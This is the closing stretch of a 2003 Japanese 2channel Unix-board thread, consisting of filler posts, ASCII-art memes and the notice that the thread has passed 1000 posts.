http://pc.2ch.net/test/read.cgi/unix/1058202104/


989 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 02:13
あれは完全放置でいいだろ。

990 名前:山崎 渉 メール:(^^) 投稿日:03/07/15 11:14

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

991 名前:950=980 メール:sage 投稿日:03/07/15 13:29
>>987
スレ立て、ありがとうございます。

992 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 14:42
埋め立て

993 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 14:42
埋め立て2

994 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 14:43
埋めたて注意

995 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 14:43
埋め立てぬるぽ

996 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 14:44
埋めた手

997 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 14:45
  ( ・∀・)   | | ガッ
 と    )    | |
   Y /ノ    人
    / )    <  >__Λ∩  
  _/し' //. V`Д´)/   ←994
 (_フ彡        /


998 名前:名無しさん@お腹いっぱい。 メール:sage 投稿日:03/07/15 14:46
埋め立てさいたま

999 名前:999 メール:sage 投稿日:03/07/15 14:46
でも,埋め立て

1000 名前:ヒマ神 投稿日:03/07/15 14:48
1000


1001 名前:1001 投稿日:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


dat2html.rb 0.1 Converted.